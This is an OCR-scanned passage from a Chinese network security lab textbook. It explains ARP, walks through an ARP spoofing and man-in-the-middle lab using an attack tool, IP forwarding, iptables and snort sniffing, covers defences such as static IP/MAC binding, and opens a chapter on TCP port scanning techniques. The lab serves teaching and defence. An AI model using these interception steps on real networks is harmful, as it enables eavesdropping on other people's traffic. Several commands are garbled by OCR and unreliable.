些 机 器 ,或 者 顺便 对 数据 流 进 行 简单 的 修改 。ARP 机 制 常常 是 自动 起 作用 的 。 在 特别 安全 
的 网 络 上 ，ARP 映射 可 以 用 固件 ,并 且 具 有 自动 抑制 协议 达到 防止 干扰 的 目的 。 

当 发 出 ARP 请 求 时 ,发 送 方 填 好 发 送 方 首 部 和 发 送 方 IP 地 址 ,还 要 填写 目标 IP 地 址 。 
当 目 标 机 器 收 到 这 个 ARP 广播 包 时 ,就 会 在 响应 报 文中 填 上 自己 的 48 位 主机 地 址 。 图 8.1 


图 8.1 ARP 缓存 表 片 段 
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ARP 协议 的 工作 过 程 描述 如 下 : 

(D PCI 希望 将 数据 发 往 PC2 ,但 它 不 知道 PC2 的 MAC 地 址 ,因此 发 送 了 一 个 ARP 
TOR ,该 请 求 是 一 个 广播 包 , 向 网 络 上 的 其 他 PC 发 出 询问 :“192. 168. 0.2 的 MAC 地 址 是 
什么 ?”, 网 络 上 的 其 他 PC 都 收 到 了 这 个 广播 包 。 

(2) PC2 看 了 这 个 广播 包 ,发现 其 中 的 IP 地 址 是 我 的 ,于 是 向 PCI 回复 了 一 个 数据 包 ， 
告诉 PC1, 我 的 MAC 地址 是 00-aa-00-62-c6-09。PC3 和 PC4 收 到 广播 包 后 ,发现 其 中 的 IP 
地 址 不 是 我 的 ,因此 保持 沉默 ,不 答复 数据 包 。 

(3) PC1 知道 了 PC2 的 MAC 地 址 , 它 可 以 向 PC2 发 送 数据 了 。 同 时 它 更 新 了 自己 的 
ARP 缓存 表 , 下 次 再 向 PC2 发 送信 息 时 ,直接 从 ARP 缓存 里 查找 PC2 的 MAC 地 址 就 可 
以 了 ,不 需要 再 次 发 送 ARP 请 求 。 


8.3.2 ARP 欺骗 攻击 


1, ARP 欺骗 定义 

从 前 面 的 介绍 可 以 看 出 ,ARP 的 致命 缺陷 是 : 它 不 具备 任何 的 认证 机 制 。 当 有 个 人 请 
求 某 个 IP 地址 的 MAC 时 ,任何 人 都 可 以 用 MAC 地 址 进行 回复 ,并 且 这 种 响应 也 会 被 认为 
是 合法 的 。 

ARP 并 不 只 在 发 送 了 ARP 请 求 后 才 接 收 ARP 应 答 。 当 主机 接收 到 ARP 应 答 数 据 包 
的 时 候 ,就 会 对 本 机 的 ARP 缓存 进行 更 新 ,将 应 答 中 的 IP 和 MAC 地 址 存储 在 ARP 缓存 
表 中 。 此 外 ,由 于 局 域 网 中 数据 包 不 是 根据 TP 地 址 ,而 是 按照 MAC 地 址 进行 传输 的 。 所 
以 对 主机 实施 ARP 欺骗 就 成 为 可 能 。 

2. ARP 欺骗 原理 

假设 这 样 一 个 网 络 ,一 个 Hub 连接 有 3 台 PC, 即 PC1、PC2 和 PC3。 

PCI 的 IP 地 址 为 172. 16. 0.1,MAC 地 址 为 11-11-11-11-11-11。 

PC2 的 IP 地 址 为 172. 16. 0.2,MAC 地 址 为 22-22-22-22-22-22。 

PC3 的 IP 地 址 为 172. 16. 0. 3,MAC 地 址 为 33-33-33-33-33-33 。 

正常 情况 下 ,PC1 的 ARP 缓存 表 内 容 如 表 8-1 所 示 。 

表 8-1 正常 情况 下 缓存 表 内 容 
Internet 地 址 物 理 地 址 类 型 


172. 16.0.3 33-33-33-33-33-33 dynamic 


下 面 PC2 要 对 PCI 进行 ARP 欺骗 攻击 ,目标 是 更 改 PCI 的 ARP 缓存 表 , 将 与 IP 地 
HE 172. 16. 0. 3 映射 的 MAC 更 新 为 PC2 的 MAC 地 址 , 即 22-22-22-22-22-22。 

PC2 向 PC] 发 送 一 个 自己 伪造 的 ARP 应 答 ,而 这 个 应 答 数 据 中 发 送 方 IP 地 址 是 172. 
16.0. 3(PC3 的 IP 地 址 ) ,MAC 地 址 是 22-22-22-22-22-22(PC3 的 MAC 地 址 本 来 应 该 是 
33-33-33-33-33-33 ,这 里 被 伪造 了 ) 。 当 PCI 收 到 PC2 伪造 的 ARP 应 答 ,就 会 更 新 本 地 的 
ARP 缓存 (PC1 不 知道 MAC 被 伪造 了 ) ,而 且 PCI 不 知道 这 个 ARP 应 答 数据 是 从 PC2 发 
送 过 来 的 。 这 样 PC1 发 送 给 PC3 的 数据 包 都 变 成 发 送 给 PC2 T. PC1 对 所 发 生 的 变化 一 
点 儿 都 没有 意识 到 ,但 是 接 下 来 的 事情 就 让 PCI 产生 了 怀疑 ,因为 它 连接 不 到 PC3 了 ,PC2 
只 是 接收 PC1 发 给 PC3 的 数据 ,并 没有 转发 给 PC3。 
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PC2 做 “man in the middle”( 中 间 人 ) ,进行 ARP 重 定向 。 打 开 自 己 的 IP 转发 功能 ,将 
PC] 发 送 过 来 的 数据 包 转 发 给 PC3, 就 好 比 一 个 路 由 器 一 样 ,而 PC3 接收 到 的 数据 包 认为 
是 从 PCL 发 送 来 的 。 不 过 ,PC3 发 送 的 数据 包 又 直接 传递 给 PC1 ,倘若 再 次 进行 对 PC3 的 
ARP 欺骗 ,那么 PC2 就 完全 成 为 PC1 与 PC3 的 中 间 桥 梁 , 对 于 PCI 与 PC3 的 通信 就 可 以 
了 如 指 掌 。 


8.3.3 ARP 命令 解释 


ARP 是 一 个 重要 的 TCP/IP 协议 ,并 且 用 于 确定 对 应 IP 地 址 的 网 卡 物理 地 址 。 使 用 
ARP 命令 ,能够 查看 本 地 计算 机 或 另 一 台 计 算 机 的 ARP 缓存 表 中 的 当前 内 容 。 此 外 ,使 用 
ARP 命令 ,也 可 以 用 人 工 方式 输入 静态 的 IP/MAC 地 址 对 。 

默认 状态 下 ,ARP 缓存 表 中 的 项 目 是 动态 的 ,每 当 发 送 一 个 指定 地 点 的 数据 帧 且 缓 存 
表 不 存在 当前 项 目 时 ,ARP 便 会 自动 添加 该 项 目 。 一 旦 缓存 表 的 项 目 被 添加 ,它们 就 已 经 
开始 走向 失效 状态 。 例 如 ,在 Windows 2003 网 络 中 ,如 果 添 加 的 缓存 项 目 没有 被 进一步 使 
用 ,该 项 目 就 会 在 2 一 10min 内 失效 。 因 此 ,如 果 ARP 缓存 表 中 项 目 很 少 或 根本 没有 时 ,请 
不 要 奇怪 ,通过 另 一 台 计算 机 或 路 由 器 的 ping 命令 即 可 添加 。 

下 面 是 ARP 常用 命令 选项 : 

(1) arp -a。 用 于 查看 缓存 表 中 的 所 有 项 目 。 

Linux 平 台 下 arp -e 输出 更 易于 阅读 。 

(2) arp -a IP。 只 显示 包含 指定 IP 的 缓存 表 项 目 。 

(3) arp -s IP MAC 地 址 。 向 ARP 缓存 表 中 添加 静态 项 目 ,该 项 目 在 计算 机 启动 过 程 
中 一 直 有 效 。 

例如 ,添加 IP 地 址 为 172. 16. 0. 152 ,映射 MAC 地 址 为 00-0c-29-95-b5-e9 的 静态 ARP 
缓存 表 项 ,命令 如 下 : 

arp - s 172.16.0.152 00- 0c- 29- 95- b5- e9 Windows 平 台 ) 

arp - s 172.16.0.152 00:0c:29:95:b5:e9 (Linux ¥ £4 ) 


(4) arp -d IP, WIR ARP 缓存 表 中 静态 项 目 。 


8.4 实验 内 容 

首先 进行 ARP 欺骗 攻击 模拟 ,包括 正常 通信 、ARP 欺骗 . 单 向 欺骗 和 完全 欺骗 四 部 分 
内 容 ; 其 次 练习 防范 ARP 欺骗 的 3 种 方式 ,包括 清空 ARP 缓存 表 、IP/MAC 地 址 绑 定 、 
ARP 监听 。 


8.5 实验 步骤 


本 练习 主机 ACE 为 一 组 ,实验 角色 说 明 如 表 8-2 所 示 。 
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表 8-2 实验 角色 说 明 


实验 主机 实验 角色 系统 环境 
A 目标 主机 一 Windows 
C 黑客 主机 Linux 
E 目标 主机 二 Windows 


8.5.1 ARP 欺骗 攻击 


本 实验 模拟 黑客 主机 通过 对 目标 主机 进行 ARP 欺骗 攻击 ,获取 目标 主机 间 的 通信 数 
据 。 实 验 的 具体 需求 如 下 : 

(1) 本 实验 使 用 交换 网 络 结构 ,组 一 、 二 和 三 间 通 过 交换 模块 连接 (主机 A、C、E 通过 交 
换 模块 连接 ,主机 B.D.F 也 通过 交换 模块 连接 )。 因 此 ,正常 情况 下 ,主机 C 无 法 以 嗅 探 方 
式 监听 到 主机 A 与 主机 下 间 通 信 数 据 , 同 样 主机 D 也 无 法 监听 到 主机 B 与 主机 下 间 的 通 
信 数 据 。 

(2) 3EBL C 要 监听 主机 A 和 主机 玉 间 的 通信 数据 ;主机 DD 要 监听 主机 B 与 主机 F 间 的 
通信 数据 。 


1, 正常 通信 
首先 ,通过 实验 来 模拟 目标 主机 一 和 目标 主机 二 之 间 进 行 正常 通信 的 情况 ,如 
图 8.2 所 示 。 
(D 目标 主机 二 单 击 工具 栏 *UDP 工具 "按钮 ,启动 VÀ 9 
UDP 连接 工具 ,创建 2513/udp 服务 端 。 "= 4 > 
(2) 目标 主机 一 启动 UDP 连接 工具 ,将 “目标 机 器 ”IP A 
地 址 指定 为 目标 主机 二 的 地 址 ,目标 端口 与 服务 器 一 致 。 在 黑客 


“数据 "文本 框 中 输入 任意 内 容 , 单 击 “ 发 送 " 按 钮 ,向 服务 端 
发 送 数 据 。 服 务 端 确定 接收 到 数据 。 

(3) 黑客 主机 单 击 工 具 栏 “控制 台 ” 按 钮 ,切换 至 /opt/ 
ExpNIS/NetAD-Lab/Tools/ids/ 目 录 (Snort 目录 ) ,执行 以 下 命令 : 


正常 
图 8.2 目标 主机 间 正 常 通信 


./snort - dev src 目标 主机 一 的 IP and udp 


通过 上 述 命 令 ,snort 仅 会 监听 源 IP 地 址 为 目标 主机 一 的 ,传输 协议 类 型 为 UDP 的 网 
络 数据 。 

(4) 目标 主机 一 再 次 向 目标 主机 二 发 送 消息 ,黑客 主机 停止 snort 监听 ( 按 Ctrl+C 组 
合 键 ) ,观察 snort 监听 结果 ,是 否 监听 到 目标 主机 间 的 通信 数据 ? 为 什么 ? 

(5) 目标 主机 一 查看 ARP 缓存 表 , 确 定 与 目标 主机 二 的 IP 相映 射 的 MAC 地 址 是 
TEW. 

2. ARP 攻击 

CD 黑客 主机 单 击 平台 工具 栏 “ 控 制 台 ”按钮 ,进入 实验 目录 ,运行 ARPattack 程序 攻击 
目标 主机 一 ,如 图 8. 3 所 示 , 将 其 ARP 缓存 表 中 与 目标 主机 二 相映 射 的 MAC 地 址 更 改 为 
黑客 主机 的 MAC 地 址 ,命令 如 下 : 
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ARPattack 目标 主机 一 P El bs 3E UL— Mac 目标 主机 二 下 


其 中 第 一 个 参数 为 被 攻击 主机 IP 地 址 ,第 二 个 参数 为 被 攻击 主机 MAC 地 址 ,第 三 个 
参数 为 与 被 攻击 主机 进行 正常 通信 的 主机 IP : 
dh. 目标 一 8 deua B a- 

通过 上 述 命令 在 目标 主机 一 的 ARP 缓存 表 a 
中 ,与 目标 主机 二 IP 相 绑 定 的 MAC 被 更 改 为 黑 N 
客 主机 MAC。 

(2) 黑客 主机 启动 snort, 同 样 监听 源 IP 地 
址 为 目标 主机 一 的 、 传 输 协 议 类 型 为 UDP 的 网 
络 数据 。 攻击 

(3) 目标 主机 一 继续 向 目标 主机 二 发 送 数 图 8.3 ARP Bei 
据 , 目 标 主机 二 是 否 接收 到 数据 ?目标 主机 间 的 
通信 和 是 否 正 常 ? 黑客 主机 停止 snort 监听 ,观察 snort 监听 结果 ,是 否 监听 到 目标 主机 间 的 
通信 数据 ?为 什么 ? 

(4) 目标 主机 一 查看 ARP 缓存 表 ,确定 与 目标 主机 二 的 IP 相映 射 的 MAC 地 址 是 否 ] 
常 。 

3. 单 向 欺骗 

正如 以 上 步骤 (2) 中 所 示 的 实验 现象 ,在 黑客 实施 简单 的 ARP 攻击 后 ,目标 主机 二 会 
接收 不 到 目标 主机 一 的 消息 ,在 接 下 来 的 时 间 里 目标 主机 一 、 二 很 容易 会 对 网 络 状况 产生 怀 
疑 。 他 们 会 去 查看 并 修改 ARP 缓存 表 。 所 以 应 尽量 减少 目标 主机 由 于 受到 ARP 攻击 而 
表现 出 的 异常 ,将 黑客 主机 作为 "中间 人 ”, 将 目标 主机 一 发 送 的 数据 转发 给 目标 主机 二 ,这 
是 一 种 很 可 行 的 方法 。 单 向 欺骗 过 程 如 图 8.4 所 示 。 


m- B B = 目标 二 
人 
ame 


mMm 


欺骗 

图 8.4 单 向 欺骗 过 程 示 意图 
(1) 黑客 主机 开启 路 由 功能 ,具体 操作 如 下 ,在 控制 台中 输入 命令 : 
echo 1» /proc/sys/net/ipv4/ip forward 


(2) 黑客 主机 捕获 来 自 目 标 主机 一 的 数据 包 ,并 将 其 转发 给 目标 主机 二 ,具体 操作 如 下 
(添加 iptables 防火 墙 转发 规则 ) : 


iptables - I FORWARD -i eth0 -o eth0 - s 目标 主 机 一 卫 -a 目 标 主机 二 IP -j aoczPT 
iptables - I FORWARD -m state - — state ESTABLISHED, RELATED — j ACCEPT 
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上 述 第 一 条 规则 允许 将 来 自 网 络 接口 eth0、 源 IP 为 目标 主机 一 IP. HA IP 为 目标 主 
机 二 IP 的 数据 包 进 行 转发 ,目的 网 络 接口 为 eth0; 第 二 条 规则 允许 接收 针对 第 一 条 规则 的 
应 答 数据 包 。 

(3) 黑客 主机 启动 snort ,监听 源 地址 为 目标 主机 一 IP、 协 议 类 型 为 UDP 的 数据 包 。 

(4) 目标 主机 一 再 次 向 目标 主机 二 发 送 UDP 数据 ,目标 主机 二 是 否 能 接收 到 数据 ? 为 
什么 ? 

(5) 黑客 主机 停止 snort 监听 ,会 观察 到 类 似 图 8. 5 所 示 信 息 。 


07/15-14:37:25. 531711 0:C:29:32:14:D6 -> 0:C:29:2F:4E:8F type:0x800 


len:0x3C 

172. 16. 0. 12:1277 -> 172. 16. 0. 189:2513 UDP TTL:64 TOS:0x0 ID:5668 IpLen: 
20 DgmLen:3l 

Len: 3 

35 35 35 555 


= 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 ==++ 


07/15-14:37:25. 532351 0:C:29:2F:4E:8F -> 0:C:29:52:37:98 type:0x800 
len:0x3C 


172. 16. 0. 12:1277 -> 172. 16. 0. 189:2513 UDP TTL:64 T0S:0x0 ID:5668 IpLen: 
20 DgmLen:31 

Len: 3 

35 35 35 555 


图 8.5 单 向 欺骗 


从 图 8. 5 所 示 信 息 中 可 以 知道 ,由 源 主机 (MAC 地 址 是 0:C:29:32:14:D6) 发 往 目 的 
主机 (MAC 地 址 是 0:C:29:52:37:98) 的 数据 包 在 网 络 传输 时 的 路 由 过 程 是 : 源 主机 一 中 
间 人 (MAC 地 址 是 0:C:29:2F:4E:8F) 一 目标 主机 。 

(6) 黑客 主机 查看 ARP 缓存 表 ,确定 与 目标 主机 一 的 IP 相映 射 的 MAC 地 址 ;确定 与 
目标 主机 二 的 IP 相映 射 的 MAC 地 址 。 

(7) 目标 主机 二 查看 ARP 缓存 表 , 确 定 与 目标 主机 一 的 IP 相映 射 的 MAC 地 址 。 

下 面 来 测试 目标 主机 二 对 目标 主机 一 的 数据 通信 情况 。 

(8) 黑客 主机 启动 snort, 仅 监听 协议 类 型 为 ICMP 的 网 络 数据 包 。 

(9) 目标 主机 一 对 目标 主机 二 进行 ping 操作 ,是 否 能 够 ping 通 ? 请 描述 数据 包 的 在 网 
络 中 的 传输 路 径 。 

(10) 黑 客 主机 停止 snort 监听 ,观察 结果 ,是 否 监听 到 主机 一 给 主机 二 发 出 的 ICMP 回 
显 请 求 数 据 包 ?是 否 监听 到 主机 二 给 主机 一 发 出 的 ICMP 回 显 应 答 数据 包 ? 为 什么 会 出 现 
此 种 现象 ? 

4. 完全 欺骗 

黑客 如 何 才 能 够 做 到 监听 目标 主机 一 与 目标 主机 二 间 的 全 部 通信 数据 呢 ? 这 种 情况 通 
常 称 为 完全 欺骗 ,完全 欺骗 过 程 如 图 8. 6 所 示 。 

(1) 黑客 对 目标 主机 二 实施 ARP 攻击 。 

(2) 黑客 主机 启动 snort, 监 听 目 标 主 机 一 与 目标 主机 二 间 的 通信 数据 。 

(3) 目标 主机 一 访问 目标 主机 二 的 Web 服务 。 

(4) 黑客 主机 观察 snort 监听 结果 。 


8.5.2 防范 ARP 欺骗 
当 发 现 主 机 通信 和 异常 或 通过 网 关 不 能 够 正常 上 网 时 ,很 可 能 是 网 关 的 IP 被 伪造 。 可 以 
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图 8.6 完全 欺骗 过 程 示意 图 


使 用 下 列 手工 方法 防范 ARP 欺骗 攻击 。 

1. 清空 ARP 缓存 表 

清空 ARP 缓存 表 的 命令 是 ,之 后 对 目标 主机 进行 ping 操作 。 

2. IP/MAC 地 址 绑 定 

实现 IP/MAC 地 址 绑 定 ,实际 上 就 是 向 ARP 缓存 表 中 添加 静态 (static) 项 目 ,这 些 项 
目 不 会 被 动态 刷新 ,在 机 器 运行 过 程 中 不 会 失效 。 

1) Linux 下 绑 定 IP/MAC 

实验 使 用 的 Linux 系统 环境 (FC5) 中 ,ARP 命令 提供 了 -f 选项 ,完成 的 功能 是 将 /etc/ 
ethers 文件 中 的 IP/MAC 地 址 对 以 静态 方式 添加 到 ARP 缓存 表 中 。 建 立 静 态 IP/MAC Fi 
绑 的 方法 如 下 : 

首先 建立 /etc/ethers 文件 (或 其 他 任意 可 编辑 文件 ) ,编辑 ethers 文件 , 写 入 正确 的 IP/ 
MAC 地 址 对 应 关系 ,格式 如 下 : 


172.16.0.151 00:0c:29:1d:af:2a 


然后 让 系统 在 启动 后 自动 加 载 项 目 , 具 体操 作 : 在 /etc/rc. d/rc. local 最 后 添加 新 行 arp 
-车 ,重启 系统 即 可 生效 。 此 时 查看 arp 缓存 表 , 静 态 项 目的 Flags Mask 内 容 为 CM, 其 中 M 
表示 当前 项 目 永久 有 效 。 

2) Windows 下 绑 定 IP/MAC 

Windows 平台 中 虽然 ARP 命令 没有 提供 -f 选项 ,但 同样 可 以 实现 IP/MAC 地 址 静态 
绑 定 ,方法 是 首先 清除 ARP 缓存 表 , 然 后 将 IP/MAC 地 址 对 添加 到 缓存 表 中 ,最 后 实现 开 
机 后 自动 执行 上 述 功 能 。 

请 根据 上 述 提示 ,结合 ARP 命令 , 写 出 实现 172. 16. 0. 152 00-0c-29-95-b5-e9 地 址 对 静 
态 绑 定 的 操作 步骤 ,并 填写 下 面 的 脚本 文件 。 


@ echo off 


exit 


3. ARP 监听 
由 于 ARP 欺骗 是 通过 伪装 其 他 IP 地 址 向 目标 主机 发 送 ARP 应 答 报 文 实现 的 ,所 以 通 


59 


网 络 安全 与 管理 实验 教程 


过 ARP 监听 可 以 监视 网 络 中 的 目标 为 本 机 的 ARP 应 答 数 据 包 的 流向 。 
设置 监听 程序 对 目标 地 址 为 本 机 地 址 或 子 网 广播 地 址 或 受 限 广播 地 址 的 ARP 数据 包 


进行 监听 。 
以 本 机 IP 地 址 为 172. 16.0. 152 . 子 网 掩 码 为 255. 255. 255. 0 为 例 , 使 用 snort 监听 满 


足 上 述 条 件 的 数据 包 ,命令 如 下 : 


-/snort - dev arp and "dst 172.16.0.50 or dst 172.16.0.255 or dst 255.255.255.255" 


8.6 思考 问题 


1. 请 选择 一 个 局 域 网 ,自行 设置 防范 ARP 欺骗 攻击 的 绑 定 代码 ,并 具体 实现 。 
2. 通过 ARP 欺骗 方 法 ,如 何 监听 局 域 网 络 ( 交 换 网 络 ) 与 Internet 之 间 的 通信 ? 
3. 网 卡 的 MAC 地 址 通常 是 由 生产 厂家 烧 入 网 卡 的 EPROM ,是否 有 办 法 修改 本 机 的 


MAC 地 址 ? 
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4593€ TCP 端口 扫描 


9.1 实验 目的 与 要 求 


。 学 习 常 用 的 端口 扫描 技术 。 

。 掌握 TCP 全 扫描 ,TCP SYN 扫描 的 原理 。 

。 掌握 TCP 全 扫描 ,TCP SYN 扫描 开发 流程 。 
。 利用 Windows Sockets 编写 网 络 应 用 程序 。 


9.2 实验 环境 


fk VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 ,在 交换 网 络 结构 下 ,每 组 1 人 ,使 
FA VC ++ 6.0 和 网 络 协议 分 析 器 。 


9.3 背景 知识 


9.3.1 端口 扫描 


“端口 ?在 计算 机 网 络 领域 中 是 一 个 非常 重要 的 概念 。 它 是 专门 为 计算 机 通信 而 设计 
的 , 它 不 是 硬件 ,不同 于 计算 机 中 的 “ 插 槽 ”, 可 以 说 是 个 “ 软 插 槽 ”。 如 果 有 需要 的 话 ,一 台 计 
算 机 中 可 以 有 上 万 个 端口 。 

端口 扫描 是 指 某 些 别有用心 的 人 发 送 一 组 端口 扫描 消息 ,试图 以 此 侵入 某 台 计算 机 ,并 
了 解 其 提供 的 计算 机 网 络 服务 类 型 (这 些 网 络 服务 均 与 端口 号 相关 ) 。 攻 击 者 可 以 通过 它 了 
解 到 从 哪里 可 探寻 到 攻击 弱点 。 实 质 上 ,端口 扫描 包括 向 每 个 端口 发 送 消息 ,一 次 只 发 送 一 
个 消息 。 接 收 到 的 回应 类 型 表示 是 否 在 使 用 该 端口 并 且 可 由 此 探寻 弱点 。 

一 个 端口 就 是 一 个 潜在 的 通信 通道 ,也 就 是 一 个 人 侵 通 道 。 对 目标 计算 机 进行 端口 扫 
描 , 能 得 到 许多 有 用 的 信息 。 进 行 扫 描 的 方法 很 多 ,可 以 是 手工 进行 扫描 ,也 可 以 用 端口 扫 
描 软 件 进行 扫描 。 在 手工 进行 扫描 时 ,需要 熟悉 各 种 命令 ,对 命令 执行 后 的 输出 进行 分 析 。 
扫描 器 是 一 种 自动 检测 远程 或 本 地 主机 安全 性 弱点 的 程序 ,通过 使 用 扫描 器 可 以 不 留 痕迹 
地 发 现 远程 服务 器 的 各 种 TCP 端口 的 分 配 及 提供 的 服务 和 它们 的 软件 版 本 ,这 就 能 间接 地 
或 直观 地 了 解 到 远程 主机 所 存在 的 安全 问题 。 用 扫描 软件 进行 扫描 时 ,许多 扫描 器 软件 都 
有 分 析 数 据 的 功能 。 


9.3.2 TCP 协议 简介 


TCP 协议 是 TCP/IP 协议 簇 中 的 面向 连接 的 可靠 的 传输 层 协 议 。TCP 允许 发 送 和 接 
收 字 节 流 形式 的 数据 。 为 了 使 服务 器 和 客户 端 以 不 同 的 速度 产生 和 消费 数据 ,TCP 提供 了 
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发 送 和 接收 两 个 缓冲 区 。TCP 提供 全 双 工 服务 .数据 同时 能 双向 流动 。 通 信 的 每 一 方 都 有 
发 送 和 接收 两 个 缓冲 区 ,可 以 双向 发 送 数 据 。TCP 在 报 文中 加 上 一 个 递 进 的 确认 序列 号 来 
告诉 发 送 者 ,接收 者 期 望 收 到 的 下 一 个 字 节 ,如 果 在 规定 时 间 内 ,没有 收 到 关于 这 个 包 的 确 
认 响 应 , 则 重新 发 送 此 包 , 这 保证 了 TCP 是 一 种 可 靠 的 传输 层 协议 。TCP 报 文 的 格式 如 
图 9.1 所 示 。 


源 端口 (16 位 ) 目的 端口 (16 位 ) 
序列 号 (32 位 ) 
确认 号 (32 位 ) 
首部 | 扣留 |ClElvUlAlPlRlsie 
长 度 Gf) |W|C|R[C|S SY |t 窗口 大 小 (16 位 ) 
(4 位 ) R|E|GK|H| TININ 
校 验 和 (16 位 ) 紧急 指针 (16 位 ) 
选项 和 填充 


图 9.1 TCP 报 文 的 格式 


9.3.3 和 常用 端口 扫描 技术 


1. TCP 全 扫描 

TCP 全 扫描 也 叫 TCP connect() 扫 描 , 这 是 最 基本 的 TCP 扫描 。 操 作 系统 提供 的 
connect() 系 统 调用 ,用 来 与 每 一 个 感 兴 趣 的 目标 计算 机 的 端口 进行 连接 。 如 果 端 口 处 于 侦 
听 状 态 ,那么 connect() 就 能 成 功 ;否则 ,这 个 端口 是 不 能 用 的 , 即 没有 提供 服务 。 这 个 技术 
的 一 个 最 大 的 优点 是 不 需要 任何 权限 。 系 统 中 的 任何 用 户 都 有 权利 使 用 这 个 调用 。 另 一 个 
好 处 就 是 速度 快 。 如 果 对 每 个 目标 端口 以 线性 的 方式 ,使 用 单独 的 connect() 调 用 ,那么 将 
会 花费 相当 长 的 时 间 , 可 以 通过 同时 打开 多 个 套 接 字 , 从 而 加 速 扫描 。 使 用 非 阻 塞 IO fe 
许 你 设置 一 个 低 的 时 间 用 尽 周期 ,同时 观察 多 个 套 接 字 。 但 这 种 方法 的 缺点 是 很 容易 被 发 
觉 ,并且 被 过 滤 掉 。 目 标 计 算 机 的 logs 文件 会 显示 一 连 串 的 连接 和 连接 时 出 错 的 服务 消 
息 ,并 且 能 很 快 地 关闭 它 。 端 口 开 放 与 端口 关闭 时 TCP 全 扫描 的 对 比 情况 如 图 9. 2 所 示 。 

(80) (1040) (79) (1039) 


a ğü ğ 


图 9.2 TCP 全 扫描 的 对 比 情况 


2. TCP SYN 扫描 
这 种 技术 通常 认为 是 “ 半 开 放 ” 扫 描 , 这 是 因为 扫描 程序 不 必要 打开 一 个 完全 的 TCP 连 
接 。 扫 描 程 序 发 送 的 是 一 个 SYN 数据 包 , 好 像 准 备 打开 一 个 实际 的 连接 并 等 待 反应 一 样 
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(参考 TCP 的 3 次 握手 建立 一 个 TCP 连接 的 过 程 )。 一 个 SYN/ACK 的 返回 信息 表示 端口 
处 于 侦 听 状态 。 一 个 RST 返回 ,表示 端口 没有 处 于 侦 听 状态 。 如 果 收 到 一 个 SYN/ACK, 
则 扫描 程序 必须 再 发 送 一 个 RST 信号 ,来 关闭 这 个 连接 过 程 。 这 种 扫描 技术 的 优点 在 于 一 
般 不 会 在 目标 计算 机 上 留 下 记录 。 但 这 种 方法 的 一 个 缺点 是 ,必须 要 有 root 权限 才能 建立 
自己 的 SYN 数据 包 。 端 口 开放 与 端口 关闭 时 TCP SYN 扫描 的 对 比 情况 如 图 9. 3 所 示 。 


(80) (76:54) (79) (7654) 


a BE B 


图 9.3 TCP SYN 扫描 的 对 比 情况 


3. TCP FIN 扫描 

有 时 可 能 SYN 扫描 都 不 够 秘密 。 一 些 防火 墙 和 包 过 滤器 会 对 一 些 指定 的 端口 进行 监 
视 , 有 的 程序 能 检测 到 这 些 扫 描 。 相 反 ,FIN 数据 包 可 能 会 没有 任何 麻烦 地 通过 。 这 种 扫描 
方法 的 思想 是 关闭 的 端口 会 用 适当 的 RST 来 回复 FIN 数据 包 。 另 外 ,打开 的 端口 会 忽略 
对 FIN 数据 包 的 回复 。 这 种 方法 和 系统 的 实现 有 一 定 的 关系 。 有 的 系统 不 管 端口 是 否 打 
开 , 都 回复 RST, 这 样 这 种 扫描 方法 就 不 适用 了 。 并 且 这 种 方法 在 区 分 UNIX 和 NT 时 是 
十 分 有 用 的 。 

4. IP 段 扫 描 

这 种 不 能 算是 新 方法 ,只 是 其 他 技术 的 变化 。 它 并 不 是 直接 发 送 TCP 探测 数据 包 , 是 
将 数据 包 分 成 两 个 较 小 的 IP 段 。 这 样 就 将 一 个 TCP 头 分 成 好 几 个 数据 包 , 从 而 过 滤器 就 
很 难 探测 到 。 但 必须 小 心 ,一 些 程 序 在 处 理 这 些小 数据 包 时 会 有 些 麻 烦 。 

5. TCP 反 向 ident 扫描 

ident 协议 允许 (rfc1413) 看 到 通过 TCP 连接 的 任何 进程 的 拥有 者 的 用 户 名 ,即使 这 个 
连接 不 是 由 这 个 进程 开始 的 。 例 如 ,连接 到 HTTP 端口 ,然后 用 identd 来 发 现 服务 器 是 否 
正在 以 root 权限 运行 。 这 种 方法 只 能 在 和 目标 端口 建立 了 一 个 完整 的 TCP 连接 后 才能 
看 到 。 

6. FTP 返回 攻击 

FTP 协议 的 一 个 有 趣 的 特点 是 它 支 持 代 理 (proxy)FTP 连接 。 即 入 侵 者 可 以 从 自己 的 
计算 机 和 目标 主机 的 FTP Server-PI( 协 议 解释 器 ) 连 接 , 建 立 一 个 控制 通信 连接 。 然 后 ,请 
求 这 个 Server-PI 激 活 一 个 有 效 的 Server-DTP( 数 据 传 输 进 程 ) 来 给 Internet 上 任何 地 方 发 
送 文 件 。 对 于 一 个 User-DTP, 这 是 个 推测 ,尽管 RFC 明确 地 定义 请 求 一 个 服务 器 发 送 文 
件 到 另 一 个 服务 器 是 可 以 的 。 给 许多 服务 器 造成 打击 ,包括 用 尽 磁盘 ,企图 越过 防火 墙 。 

利用 这 个 的 目的 是 从 一 个 代理 的 FTP 服务 器 来 扫描 TCP 端口 。 这 样 ,就 能 在 一 个 防 
火 墙 后 面 连 接 到 一 个 FTP 服务 器 ,然后 扫描 端口 (这 些 原来 有 可 能 被 阻塞 )。 如 果 FTP 服 
务 器 允许 从 一 个 目录 读 写 数据 ,就 能 发 送 任意 的 数据 到 发 现 的 打开 的 端口 。 
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对 于 端口 扫描 ,这 个 技术 是 使 用 PORT 命令 来 表示 被 动 的 User DTP 正在 目标 计算 机 
上 的 某 个 端口 侦 听 。 然 后 人 侵 者 试图 用 LIST 命令 列 出 当前 目录 ,结果 通过 Server-DTP 发 
送出 去 。 如 果 目 标 主 机 正在 某 个 端口 侦 听 ,传输 就 会 成 功 (产生 一 个 150 或 226 的 回应 ); 否 
则 ,会 出 现 "425 Can't build data connection: Connection refused."。 然 后 ,使 用 另 一 个 
PORT 命令 ,尝试 目标 计算 机 上 的 下 一 个 端口 。 这 种 方法 的 优点 很 明显 ,就 是 难以 跟踪 ,能 
穿 过 防火 墙 。 主 要 缺点 是 速度 很 慢 , 有 的 FTP 服务 器 最 终 能 得 到 一 些 线 索 ,关闭 代理 功能 。 


9.4 实验 内 容 


使 用 VC++ 6.0 开 发 TCP 全 扫描 应 用 程序 ,并 使 用 协议 分 析 器 进行 抓 包 分 析 ; 使 用 
VC++ 6.0 开发 TCP SYN 扫描 应 用 程序 ,并 使 用 协议 分 析 器 进行 抓 包 分 析 。 


9.5 实验 步骤 


9.5.1 TCP 全 扫描 
TCP 全 扫描 开发 流程 如 图 9. 4 所 示 。 


入 口 参数 检查 ， 包 括 起 始 、 终 止 端口 
i 


调用 WSAStartup 国 数 ， 加 载 Winsock 

